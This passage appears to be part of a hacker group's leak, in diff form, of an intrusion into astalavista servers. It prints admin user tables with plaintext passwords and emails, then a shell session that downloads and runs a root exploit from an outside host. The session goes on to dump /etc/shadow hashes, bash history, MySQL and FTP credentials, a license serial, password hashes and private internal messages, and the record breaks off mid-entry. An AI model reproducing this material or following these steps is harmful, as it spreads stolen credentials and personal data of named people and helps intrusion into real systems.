+| freemember               | set('0','1')                         | NO   |     | 0                   |                |
+| ordertype                | set('transfer','wp','pp','mc','CnB') | YES  |     | NULL                |                |
+| lang                     | tinytext                             | NO   |     |                     |                |
+| adid                     | smallint(6)                          | NO   |     | 0                   |                |
+| pp_txn_id                | varchar(255)                         | YES  |     | NULL                |                |
+| cnb_transaction_id       | varchar(255)                         | YES  |     | NULL                |                |
+| cnb_order_id             | varchar(255)                         | YES  |     | NULL                |                |
+| cnb_user_id              | int(11)                              | YES  |     | 0                   |                |
++--------------------------+--------------------------------------+------+-----+---------------------+----------------+
+22 rows in set (0.01 sec)
+
+mysql> select count(*) as skids from users;
++-------+
+| skids |
++-------+
+| 25199 |
++-------+
+1 row in set (0.00 sec)
+
+mysql> select user,nickname,password,email from users where userlevel = 1;
++--------------------------+----------------------+------------------+-----------------------------------+
+| user                     | nickname             | password         | email                             |
++--------------------------+----------------------+------------------+-----------------------------------+
+| pascal                   | prozac               | astaman3         | info@astalavista.net              |
+| Ivan Schmid              | rOOtless1            | astalavista4asta | ivan.schmid@comvation.com         |
+| qreymer                  | Palermo              | qblsw85iam       | eche@home.se                      |
+| Christian Wehrli         | g0atherd             | hitt?74          | g0atherd@gmx.net                  |
+| Andrew Blake             | Minky                | liq73uid         | a.blake@har.mrc.ac.uk             |
+| Martin Wyss              | dinu                 | kj63;cXy         | martin.wyss@astalavista.net       |
+| Leandro Nery             | Timan_no_Sanco       | nery2002         | leandronery@hotmail.com           |
+| shaving ryans privates   | ShavingRyansPrivates | memberboard313   | shavingryansprivates1@hotmail.com |
+| Gerben van der Lubbe     | Spoofed Existence    | Lb59eXg5         | spoofedexistence@hotmail.com      |
+| David M Lee              | Daremo               | icG12m03         | daremo@hackerheaven.com           |
+| David Corn               | akriel               | ve3uB$cUku       | akriel@fallenroot.net             |
+| Thomas Kalin             | Gwanun               | QwErTy123        | thomas.kaelin@astalavista.net     |
+| Marcus unknown           | Cra58cker            | hhCr4ck06        | unknownmarcus@hotmail.com         |
+| David Ellis              | dellis203            | philip           | dellis@nightwatchnss.com          |
+| Lars Christian Solberg   | xeor                 | tF3s4|Nea        | xeor@hush.com                     |
+| Paulo Santos             | Be1er0ph0r1          | amor01           | pmsantos@gmx.ch                   |
+| Thomas D?ppen            | daha                 | asta4tom         | thomas.daeppen@astalavista.ch     |
+| Touraj Abbasi Moghaddasi | -Crow1               | NetR0ck          | toraj.a.m@gmail.com               |
+| Fabius Bernet            | traviser             | wellenreiter100  | fabius.bernet@astalavista.ch      |
+| Zachary McElroy          | duder1               | dirty245dix      | mcelroyzj@yahoo.com               |
+| Leron Cohen              | cohen2               | leron4free       | leron@quiredmedia.com             |
+| Beatriz Pontes           | anonymous1656        | pitas            | joao.pedro.pontes@gmail.com       |
+| Glafkos Charalambous     | anonymous2086        | si99490178$#     | nowayout@webhostline.com          |
+| developer COMVATION      | anonymous2402        | Ri?Q$Q$MVU       | ivan.schmid@astalavista.ch        |
+| Peter Fisher             | cyph3r1              | testZer025435    | cyph3r@astalavista.com            |
+| sykadul                  | sykadul              | ak29eral         | sykadul@gmail.com                 |
+| Ronny Janzi              | commander1           | mpbdaagf6m       | ronny.janzi@astalavista.ch        |
++--------------------------+----------------------+------------------+-----------------------------------+
+27 rows in set (0.00 sec)
+
+mysql> exit;
+Bye
+
+[~] plaintext passwords? yes, 
+	Those so called "security professionals" who charge you $6.66 / month to
+	register at their hack-proof portal, save your passwords in plaintext...
+	brilliant!
+
+
+[~] This been fun but we want more.
+
+sh-3.2$ uname -a
+Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
+sh-3.2$ wget http://anti.sec.labs/g0troot
+--13:33:37--  http://anti.sec.labs/g0troot
+Resolving anti.sec.labs... 13.33.33.37
+Connecting to anti.sec.labs|13.33.33.37|:80... connected.
+HTTP request sent, awaiting response... 200 OK
+Length: 18200 (18K) [text/plain]
+Saving to: `g0troot'
+
+100%[=========================================================================================================================================>] 18,200      58.6K/s   in 
+0.3s
+
+18:55:14 (58.6 KB/s) - `g0troot' saved [18200/18200]
+
+sh-3.2$ ./g0troot -i x86_64
+	[+] g0troot - anti.sec.labs
+	[+] Target: 2.6.18-128.1.10.el5
+	[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
+	
+	[+] r00tr00t
+	[~] Executing shell...
+	
+sh-3.2# id
+uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
+
+sh-3.2# cat /etc/shadow
+root:$1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
+[snip]
+admin:$1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
+jon:$1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
+com:$1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
+astanet:$1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
+
+sh-3.2# cat /etc/motd
+#####################################################
+#____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #
+# |__| [__   |  |__| |    |__| |  | | [__   |  |__| #
+# |  | ___]  |  |  | |___ |  |  \/  | ___]  |  |  | #
+#                                                   #
+#####################################################
+#                                                   #
+# Admin Contact - support@secureservertech.com      #
+#                                                   #
+# Available ShortCuts                               #
+#                                                   #
+# nst -  list active connections                    #
+# ddos - shows how many times each ip is connected  #
+# ltr -  restart the webserver                      #
+# phpc - edit the php config file                   #
+# htc -  edit the webserver configuration file      #
+# up -   uptime                                     #
+# etd - edit the motd of the day file               #
+# htr - start and restart apache if needed          #
+# syng - shows active SYN_RECV connections          #
+# synd - syn flood blocker - "synd -h" for usage    #
+#####################################################
+# NOTES:                                            #
+# Last Upgrade - 12-08-2008 by JF                   #
+# My.cnf/Mysql Optimization - 1-28-09               #
+#                                                   #
+#                                                   #
+#                                                   #
+#####################################################
+
+sh-3.2# lastlog | grep -v Never
+Username         Port     From             Latest
+root             pts/1    adsl-194-162-fix Thu Jun  4 07:19:14 +0000 2009
+admin            pts/1    cp.secureservert Thu Mar 20 10:25:39 +0000 2008
+com              pts/0    cust.static.212- Tue Jun  2 07:46:30 +0000 2009
+astanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
+
+sh-3.2# ls -la
+total 453376
+drwxr-x--- 15 root root       4096 Jun  4 08:40 .
+drwxr-xr-x 25 root root       4096 Jun  3 02:43 ..
+-rw-r--r--  1 root root    2394400 Oct 19  2007 10mbtest.zip
+-rw-------  1 root root       1006 Sep 11  2007 anaconda-ks.cfg
+-rw-------  1 root root      16836 Jun  4 07:21 .bash_history
+-rw-r--r--  1 root root         24 Jan  6  2007 .bash_logout
+-rw-r--r--  1 root root        191 Jan  6  2007 .bash_profile
+-rw-r--r--  1 root root        176 Jan  6  2007 .bashrc
+-rwx------  1 root root       1899 Oct 28  2007 bk.sh
+-rw-r--r--  1 root root       1327 Nov 29  2007 cert
+-rw-r--r--  1 root root  139860821 May 14  2008 contrexxbackup_20080514.sql
+drwxr-xr-x  4 root root       4096 May 20  2008 .cpan
+-rw-r--r--  1 root root        100 Jan  6  2007 .cshrc
+-rw-r--r--  1 root root     323079 Mar 31 13:48 defaultp_ports.sql
+drwx------  2 root root       4096 Oct 28  2007 .elinks
+drwxr-xr-x 13 root root       4096 Mar 21  2008 gdb-6.7.1
+-rw-r--r--  1 root root   15080950 Oct 29  2007 gdb-6.7.1.tar.bz2
+-rw-------  1 root root          0 Apr 16 13:19 .history
+-rw-r--r--  1 root root      16095 Sep 11  2007 install.log
+-rw-r--r--  1 root root       2566 Sep 11  2007 install.log.syslog
+-rw-r--r--  1 root root       1003 Jul 22  2007 install.sh
+-rw-------  1 root root         35 Jun  2 14:23 .lesshst
+drwxr-xr-x  2 root root       4096 Dec 29  2007 .lftp
+drwxr-xr-x 10 root root       4096 Sep 14  2007 linux-2.6.19.2-grsec
+-rw-r--r--  1 root root   94979336 Feb 16  2007 linux-2.6.19.2-grsec.tar.gz
+-rw-r--r--  1 root root    4737058 Sep 22  2007 linux-2.6.22.tar.bz2
+-rwx------  1 root root        760 Sep 18  2008 lp
+drwxr-xr-x 12 root root       4096 Nov 30  2007 lsws-3.3.1
+-rw-r--r--  1 root root    2480045 Nov 30  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
+-rw-r--r--  1 root root    6388501 Nov 29  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
+drwxr-xr-x 12 root root       4096 Mar 21  2008 lsws-3.3.9
+-rw-r--r--  1 root root    6437577 Mar 21  2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
+drwxr-xr-x 12 root root       4096 May 29 15:10 lsws-4.0.3
+-rw-r--r--  1 root root    6496050 May  8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
+-rw-r--r--  1 root root      25316 Feb 15  2006 mybk.sh
+-rw-------  1 root root         41 Oct 19  2007 .my.cnf
+-rw-------  1 root root       2902 Jun  4 08:40 .mysql_history
+-rwx------  1 root root      38873 Apr 16  2008 mysqlreport
+-rw-------  1 root root         41 May 20  2008 .mytop
+drwxr-xr-x  3 1000  1000      4096 May 20  2008 mytop-1.6
+-rw-r--r--  1 root root      19720 Feb 17  2007 mytop-1.6.tar.gz
+drwxr-xr-x  2 root root       4096 Oct 28  2007 .ncftp
+-rw-------  1 root root       1462 Sep 21  2007 opt.php
+-rw-r--r--  1 root root       3371 Sep 22  2007 p
+-rw-r--r--  1 root root    7608429 Aug 30  2007 php-5.2.4.tar.bz2
+-rw-------  1 root root       1024 Feb  3 21:32 .rnd
+-rw-r--r--  1 root root        716 Nov 28  2007 server.csr
+-rw-r--r--  1 root root        887 Nov 28  2007 server.key
+drwx------  2 root root       4096 Oct 10  2008 .ssh
+-rw-r--r--  1 root root      44227 Oct 28  2007 tar-inc-backup.dat
+-rw-r--r--  1 root root        129 Jan  6  2007 .tcshrc
+-rw-r--r--  1 root root  104874307 Oct 17  2007 test100.zip
+-rw-r--r--  1 root root   67085540 Oct 19  2007 test100.zip.1
+drwxr-xr-x  2 root root       4096 Apr 29 11:15 tmp
+-rw-r--r--  1 root root      42596 May 21  2007 tuning-primer.sh
+drwxrwxrwx 19 1000 users      4096 Mar 21  2008 valgrind-3.3.0
+-rw-r--r--  1 root root    4519551 Dec 11  2007 valgrind-3.3.0.tar.bz2
+-rw-------  1 root root      12997 May 16  2008 .viminfo
+
+sh-3.2# cat .bash_history
+[snip]
+wget cp4sst.com/sstlinux.tar.gz
+tar zxvf sstlinux.tar.gz
+cd linux-2.6.27.10
+sh install.sh
+make bzImage ; make modules ; make modules_install ; make install
+make clean
+service mysqld restart
+[snip]
+cd /usr/sbin/
+chmod 4777 traceroute
+chmod 4777 ping
+traceroute -I www.astalavista.ch
+[snip]
+vi /etc/csf/csf.conf
+traceroute google.ch
+service csf restart
+tracert google.ch
+service csf restart
+traceroute www.google.ch
+tracert www.google.ch
+traceroute www.google.ch
+locate traceroute
+chown 4755 /bin/traceroute
+chown 4777 /bin/traceroute
+locate ping
+chown 4755 /bin/ping
+chown 4777 /bin/ping
+cd /bin/
+ls -ali | grep ping
+chown root ping
+chmod 4755 ping
+ls -ali | grep traceroute
+chown root traceroute
+chmod 4755 traceroute
+ls -ali | grep traceroute
+traceroute -I www.google.ch
+traceroute www.google.ch
+whois pmsantos.ch
+[snip]
+mysql -h com_contrexx2_live < /root/defaultp_ports.sql
+mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
+mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
+mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
+top
+ping ssth.ch
+ping asdlkfaljgasd???ljg???lasj.ch
+ping asdlkfaljgasdlasj.ch
+ping www.ssth.ch
+ping ssth.ch
+nslookup www.google.ch
+nslookup www.ssth.ch
+man nslookup
+ping www.google.ch
+nslookup www.google.ch
+nslookup www.google.ch
+nslookup salfjasdlf.ch
+[snip]
+openssl passwd -1 sadf
+openssl passwd -1 5cZNHstdTy
+mysql
+mysql
+locate proftp
+vi /etc/proftpd.passwd
+service proftpd restart
+locate proftpd.conf
+vi /etc/proftpd.conf
+vi /etc/proftpd.passwd
+service proftpd restart
+[snip]
+/bin/sh /home/com/backup_system/backup.sh
+tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
+mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
+mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
+ls -ali
+mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
+mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
+crontab -l
+crontab -l
+php -q /home/com/public_html/modifications/cronjobs/securitynews.php
+/home/com/public_html/modifications/cronjobs/exploits.sh
+wget http://www.litespeedtech.com/packages/4.0/lsws-4.0.3-ent-x86_64-linux.tar.gz
+tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
+cd lsws-4.0.3
+sh install.sh
+uptime
+hdparm -tt /dev/sda
+iostat
+yum install iostat
+iostat
+whereis iostat
+yjm clean all
+yum clean all ; yum -y update
+iostat
+yum install systat
+rpm -qa | grep iostat
+rpm -qa | grep sysstat
+rpm -qa | grep systat
+dmesg -c
+sysctl -p
+uname -r
+cd /usr/src
+wget nix101.com/kernels/sstlinux.tar.gz
+shutdown -r now
+nano -w /boot/grub/grub.conf
+
+sh-3.2# cat .my.cnf
+[client]
+user=da_admin
+password=X9dctmRH
+
+sh-3.2# cat /home/com/backup_system/backup.sh
+#!/bin/sh
+#####################################################################
+#                                                                   #
+#   incremental backup for astalavista.com                          #
+#                                                                   #
+#   author:    Paulo M. Santos        #
+#                                                                   #
+#####################################################################
+[snip]
+PROG_DIR="/home/com/backup_system";
+BACKUP_DIR="/home/com/backups";
+DOBACKUP_FROM="/home/com/domains/astalavista.com/public_html";
+# ftp for synology backup server
+FTP_HOST="212.254.194.163";
+FTP_PORT="21";
+FTP_USER="astalavista.com";
+FTP_PASS="yWHOJbzpWTWC6Xrmg1WnfBk5V";
+FTP_DIR="/astalavista.com";
+# database
+DB_HOST="localhost";
+DB_USER="contrexxuser2";
+DB_PASS="0fEYNZgXz1pKe";
+DB_DATABASE1="com_contrexx2_live";
+DB_DATABASE2="com_contrexx2";
+[snip]
+ftp -in $FTP_HOST $FTP_PORT < ./domains/astalavista.net/public_html
+-rw-r-----  1 astanet mail      34 Dec 22 12:41 .shadow
+
+sh-3.2# cd auth/
+sh-3.2# ls -la
+total 28
+drwxr-xr-x 2 root    root    4096 Dec 23 16:00 .
+drwx--x--x 6 astanet astanet 4096 Jun  4 09:51 ..
+-rw-r--r-- 1 root    root     321 Jan  5  2006 hackercontest.config.inc.php
+-rw-r--r-- 1 root    root     319 Jan  5  2006 hosting.config.inc.php
+-rw-r--r-- 1 root    root      24 Jun  4 09:38 .htadm_pwd
+-rw-r--r-- 1 root    root      49 Jan  5  2006 .htpasswd_newhosting
+-rw-r--r-- 1 root    root      51 Oct 11  2006 .htwebalizer_pwd
+
+sh-3.2# cat hackercontest.config.inc.php
+
+sh-3.2# cat hosting.config.inc.php
+
+
+sh-3.2# cd ..
+sh-3.2# cd com
+sh-3.2# ls -la
+total 141208
+drwx--x--x 10 com  com       4096 Apr 28 12:40 .
+drwxr-xr-x 14 root root      4096 Mar 11 17:56 ..
+drwx------  2 com  com       4096 Jun  4 04:04 backups
+-rw-r--r--  1 root root   2419504 Sep 28  2007 backup.sql
+drwxr-xr-x  2 com  com       4096 May 12 15:20 backup_system
+-rw-------  1 com  com      21880 Jun  2 08:07 .bash_history
+-rw-r--r--  1 com  com         24 Sep 24  2007 .bash_logout
+-rw-r--r--  1 com  com        176 Sep 24  2007 .bash_profile
+-rw-r--r--  1 com  com        124 Sep 24  2007 .bashrc
+drwx--x--x  3 com  com       4096 Jan 29  2008 domains
+-rw-r--r--  1 com  com      16409 Jul 16  2008 FWUser.class.php.fixed
+drwxrwx---  3 com  mail      4096 Jan  6 19:24 imap
+-rw-------  1 com  com         69 Nov 18  2008 .lesshst
+drwx------  2 com  com       4096 Sep 24  2007 mail
+-rw-------  1 com  com      13970 Mar 28 21:42 .mysql_history
+drwxr-xr-x  2 com  com       4096 Aug 20  2008 .ncftp
+lrwxrwxrwx  1 com  com         37 Sep 24  2007 public_html -> ./domains/astalavista.com/public_html
+-rw-r-----  1 com  mail        34 Sep 24  2007 .shadow
+drwx------  2 com  com       4096 Aug 26  2008 .ssh
+-rwx------  1 com  com       8515 Feb 10  2008 t
+-rw-rw-r--  1 com  com       6265 Feb 11  2008 t.c
+drwxrwxr-x  2 com  com       4096 Jan 30 15:47 tmp
+-rw-rw-r--  1 com  com        617 May 20  2008 .toprc
+-rw-rw-r--  1 com  com  141851766 May 19  2008 version2-backup-20080519-0900.sql
+-rw-------  1 com  com      16629 Mar 28 21:46 .viminfo
+-rw-rw-r--  1 com  com         51 Aug 25  2008 .vimrc
+
+sh-3.2# head t.c
+/*
+ * jessica_biel_naked_in_my_bed.c
+ *
+ * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
+ * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
+ * Stejnak je to stare jak cyp a aj jakesyk rozbite.
+ *
+ * Linux vmsplice Local Root Exploit
+ * By qaaz
+ *
+
+sh-3.2# cd /
+sh-3.2# ls -la
+total 360
+drwxr-xr-x  25 root root   4096 Jun  3 02:43 .
+drwxr-xr-x  25 root root   4096 Jun  3 02:43 ..
+-rw-------   1 root root  10240 Jun  3 02:39 aquota.group
+-rw-------   1 root root  10240 Jun  3 02:39 aquota.user
+-rw-r-----   1 root root    819 Jul 17  2008 astalavista.us.db
+-rw-r--r--   1 root root      0 Jun  3 02:43 .autofsck
+-rw-r--r--   1 root root      0 Sep 16  2007 .autorelabel
+drwxr-xr-x   3 root root   4096 Dec 29  2007 backup
+drwxr-xr-x   2 root root   4096 Jun  4 04:03 bin
+drwxr-xr-x   5 root root   4096 Jun  2 14:06 boot
+drwxr-xr-x  11 root root   3620 Jun  3 02:43 dev
+drwxr-xr-x  84 root root  12288 Jun  4 03:16 etc
+drwxr-xr-x  14 root root   4096 Mar 11 17:56 home
+-rw-r--r--   1 root root  13387 Mar 20  2008 httpd.conf
+drwxr-xr-x  11 root root   4096 Jun  4 04:02 lib
+drwxr-xr-x   7 root root   4096 Jun  4 04:03 lib64
+drwx------   2 root root  16384 Sep 11  2007 lost+found
+drwxr-xr-x   2 root root   4096 Mar 11 17:56 media
+drwxr-xr-x   2 root root      0 Jun  3 02:43 misc
+drwxr-xr-x   2 root root   4096 Mar 11 17:56 mnt
+-rw-r--r--   1 root root   5859 Feb  3  2008 mrtg.cfg
+drwxr-xr-x   2 root root      0 Jun  3 02:43 net
+drwxr-xr-x   3 root root   4096 Mar 11 17:56 opt
+dr-xr-xr-x 264 root root      0 Jun  3 02:42 proc
+drwxr-x---  15 root root   4096 Jun  4 08:40 root
+drwxr-xr-x   2 root root  12288 Jun  4 04:03 sbin
+drwxr-xr-x   2 root root   4096 Mar 11 17:56 selinux
+drwxr-xr-x   2 root root   4096 Mar 11 17:56 srv
+drwxr-xr-x  11 root root      0 Jun  3 02:42 sys
+drwxrwxrwt   4 root root 122880 Jun  4 10:35 tmp
+drwxr-xr-x  16 root root   4096 Jun  2 13:56 usr
+drwxr-xr-x  26 root root   4096 Jun  4 03:16 var
+
+sh-3.2# cd opt
+sh-3.2# ls -la
+total 20
+drwxr-xr-x  3 root root 4096 Mar 11 17:56 .
+drwxr-xr-x 25 root root 4096 Jun  3 02:43 ..
+drwxr-xr-x 15 root root 4096 Mar 20  2008 lsws
+
+sh-3.2# cd lsws/
+sh-3.2# ls -la
+total 108
+drwxr-xr-x 15 root   root    4096 Mar 20  2008 .
+drwxr-xr-x  3 root   root    4096 Mar 11 17:56 ..
+drwxr-xr-x  8 root   root    4096 Mar 20  2008 add-ons
+drwxr-xr-x 13 root   root    4096 May 29 15:10 admin
+drwxr-xr-x  5 apache apache  4096 May 29 15:10 autoupdate
+drwxr-xr-x  2 root   root    4096 May 29 15:10 bin
+drwx------  4 apache apache  4096 Jun  3 02:43 conf
+drwxr-xr-x  7 apache apache  4096 Mar 20  2008 DEFAULT
+drwxr-xr-x  2 root   root    4096 Sep 15  2008 docs
+drwxr-xr-x  2 root   root    4096 May 29 15:10 fcgi-bin
+drwxr-xr-x  2 root   root    4096 Sep 15  2008 lib
+-rw-r--r--  1 root   root    6959 May 29 15:10 LICENSE
+-rw-r--r--  1 root   root    2214 May 29 15:10 LICENSE.OpenLDAP
+-rw-r--r--  1 root   root    6279 May 29 15:10 LICENSE.OpenSSL
+-rw-r--r--  1 root   root    3208 May 29 15:10 LICENSE.PHP
+drwxr-xr-x  2 root   root   20480 Jun  4 09:55 logs
+drwxr-xr-x  2 root   root    4096 Mar 20  2008 php
+drwx------  2 apache apache  4096 Mar 20  2008 phpbuild
+drwxr-xr-x  3 root   root    4096 Mar 20  2008 share
+-rw-r--r--  1 root   root       6 May 29 15:10 VERSION
+
+sh-3.2# cd conf
+sh-3.2# ls -la
+total 48
+drwx------  4 apache apache 4096 Jun  3 02:43 .
+drwxr-xr-x 15 root   root   4096 Mar 20  2008 ..
+drwx------  2 apache apache 4096 Mar 20  2008 cert
+-rw-r--r--  1 apache apache 6668 May 29 15:13 httpd_config.xml
+-rw-------  1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
+-rw-r--r--  1 root   apache    0 Jun  3 14:11 .last
+-rw-------  1 apache apache  256 May 29 15:10 license.key
+-rw-------  1 apache apache  256 Mar 21  2008 license.key.old
+-rw-------  1 apache apache 3320 Mar 20  2008 mime.properties
+-rw-------  1 apache apache   20 May 29 15:10 serial.no
+drwx------  2 apache apache 4096 Mar 20  2008 templates
+
+sh-3.2# cat serial.no
+IbDl-oVsO-CKqL-wVRa
+
+sh-3.2# mysql
+Welcome to the MySQL monitor.  Commands end with ; or \g.
+Your MySQL connection id is 286844
+Server version: 5.0.45-community-log MySQL Community Edition (GPL)
+
+Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
+
+mysql> show databases;
++-----------------------+
+| Database              |
++-----------------------+
+| information_schema    |
+| astanet_ads           |
+| astanet_mailing_lists |
+| astanet_mediawiki     |
+| astanet_membersystem  |
+| com_contrexx          |
+| com_contrexx2         |
+| com_contrexx2_live    |
+| da_roundcube          |
+| dolphin               |
+| ideapool              |
+| mysql                 |
+| test                  |
+| yourmaster            |
++-----------------------+
+14 rows in set (0.00 sec)
+
+mysql> use ideapool
+Database changed
+mysql> show tables;
++-----------------------------------+
+| Tables_in_ideapool                |
++-----------------------------------+
+| eventum_columns_to_display        |
+| eventum_custom_field              |
+| eventum_custom_field_option       |
+| eventum_custom_filter             |
+| eventum_customer_account_manager  |
+| eventum_customer_note             |
+| eventum_email_account             |
+| eventum_email_draft               |
+| eventum_email_draft_recipient     |
+| eventum_email_response            |
+| eventum_faq                       |
+| eventum_faq_support_level         |
+| eventum_group                     |
+| eventum_history_type              |
+| eventum_irc_notice                |
+| eventum_issue                     |
+| eventum_issue_association         |
+| eventum_issue_attachment          |
+| eventum_issue_attachment_file     |
+| eventum_issue_checkin             |
+| eventum_issue_custom_field        |
+| eventum_issue_history             |
+| eventum_issue_quarantine          |
+| eventum_issue_requirement         |
+| eventum_issue_user                |
+| eventum_issue_user_replier        |
+| eventum_link_filter               |
+| eventum_mail_queue                |
+| eventum_mail_queue_log            |
+| eventum_news                      |
+| eventum_note                      |
+| eventum_phone_support             |
+| eventum_project                   |
+| eventum_project_category          |
+| eventum_project_custom_field      |
+| eventum_project_email_response    |
+| eventum_project_field_display     |
+| eventum_project_group             |
+| eventum_project_link_filter       |
+| eventum_project_news              |
+| eventum_project_phone_category    |
+| eventum_project_priority          |
+| eventum_project_release           |
+| eventum_project_round_robin       |
+| eventum_project_status            |
+| eventum_project_status_date       |
+| eventum_project_user              |
+| eventum_reminder_action           |
+| eventum_reminder_action_list      |
+| eventum_reminder_action_type      |
+| eventum_reminder_field            |
+| eventum_reminder_history          |
+| eventum_reminder_level            |
+| eventum_reminder_level_condition  |
+| eventum_reminder_operator         |
+| eventum_reminder_priority         |
+| eventum_reminder_requirement      |
+| eventum_reminder_triggered_action |
+| eventum_resolution                |
+| eventum_round_robin_user          |
+| eventum_search_profile            |
+| eventum_status                    |
+| eventum_subscription              |
+| eventum_subscription_type         |
+| eventum_support_email             |
+| eventum_support_email_body        |
+| eventum_time_tracking             |
+| eventum_time_tracking_category    |
+| eventum_user                      |
++-----------------------------------+
+69 rows in set (0.00 sec)
+
+mysql> describe eventum_user;
++-------------------------+------------------+------+-----+---------------------+----------------+
+| Field                   | Type             | Null | Key | Default             | Extra          |
++-------------------------+------------------+------+-----+---------------------+----------------+
+| usr_id                  | int(11) unsigned | NO   | PRI | NULL                | auto_increment |
+| usr_grp_id              | int(11) unsigned | YES  | MUL | NULL                |                |
+| usr_customer_id         | int(11) unsigned | YES  |     | NULL                |                |
+| usr_customer_contact_id | int(11) unsigned | YES  |     | NULL                |                |
+| usr_created_date        | datetime         | NO   |     | 0000-00-00 00:00:00 |                |
+| usr_status              | varchar(8)       | NO   |     | active              |                |
+| usr_password            | varchar(32)      | NO   |     |                     |                |
+| usr_full_name           | varchar(255)     | NO   |     |                     |                |
+| usr_email               | varchar(255)     | NO   | UNI |                     |                |
+| usr_preferences         | longtext         | YES  |     | NULL                |                |
+| usr_sms_email           | varchar(255)     | YES  |     | NULL                |                |
+| usr_clocked_in          | tinyint(1)       | YES  |     | 0                   |                |
+| usr_lang                | varchar(5)       | YES  |     | NULL                |                |
++-------------------------+------------------+------+-----+---------------------+----------------+
+13 rows in set (0.00 sec)
+
+mysql> select usr_full_name,usr_email,usr_password from eventum_user;
++----------------------+-------------------------------+----------------------------------+
+| usr_full_name        | usr_email                     | usr_password                     |
++----------------------+-------------------------------+----------------------------------+
+| system               | system-account@example.com    | 14589714398751513457adf349173434 |
+| Developer (Paulo)    | paulo.santos@astalavista.ch   | 26a35a1cf8895c27fb37ef4cf149f7bb |
+| Be1er0ph0r           | be1er0ph0r@gmx.de             | 229766dc0ca1fb67160a8782321dfdce |
+| Admin                | pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
+| ADMIN                | admin@astalavista.ch          | f6fdffe48c908deb0f4c3bd36c032e72 |
+| USER                 | user@astalavista.ch           | 5cc32e366c87c4cb49e4309b75f57d64 |
+| Glafkos - (nowayout) | glafkos@astalavista.com       | f7735ab119023a8abb2301e67f81cd67 |
+| Joao                 | joao.pontes@astalavista.net   | f805c071d7c823b937448c54c047b9fd |
+| Pascal               | pm@astalavista.ch             | e10adc3949ba59abbe56e057f20f883e |
+| commander            | commander@astalavista.com     | 932cd250918f881d41feb0b93883a926 |
+| ishtus               | ishtus@astalavista.com        | a587ffc88b3dbbba3fd2fe67af649ff0 |
+| sykadul              | sykadul@astalavista.com       | 20224a2f3eeb57a13a10b4df543c128e |
+| Zach McElroy         | admin@badfoo.net              | 33c5d4954da881814420f3ba39772644 |
+| usb                  | usbenigma@hushmail.com        | b513f22c3db6932855ad732f5f8a10a2 |
+| cyph3r               | cyph3r@astalavista.com        | 6e1e50017a945e874d52ec91f9ab2cee |
++----------------------+-------------------------------+----------------------------------+
+15 rows in set (0.00 sec)
+
+mysql> select iss_description from eventum_issue where iss_id = 43;
++-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+| iss_description                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 
+|
++-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in... how to do that? well think about it... if a user is watching a movie... he'll be 
+connected for 90 mins... 120mins... so what i propose is something like:
+http://www.surfthechannel.com/
+since they only provide LINKS to the movies they are LEGAL and don't break DMCA rules... so we could do the same... "iframe" the content on our website or use a system 
+like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed... which doesn't 
+break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off 
+if they think it breaks copyright laws and we will remove it... i think that makes it on the border of DMCA...
+
+We could also put advertisement during play on the flash video player itself... extra $$...
+
+By sykadul |
++-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+1 row in set (0.00 sec)
+
+// Money and extra $$ is all they care about. remember that.
+
+mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
++------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+| iss_summary            | iss_description                                                                                                                                                                                                                           
+|
++------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+| Forum for REAL EXPERTS | Hello,
+
+				Ishtus and I,
+
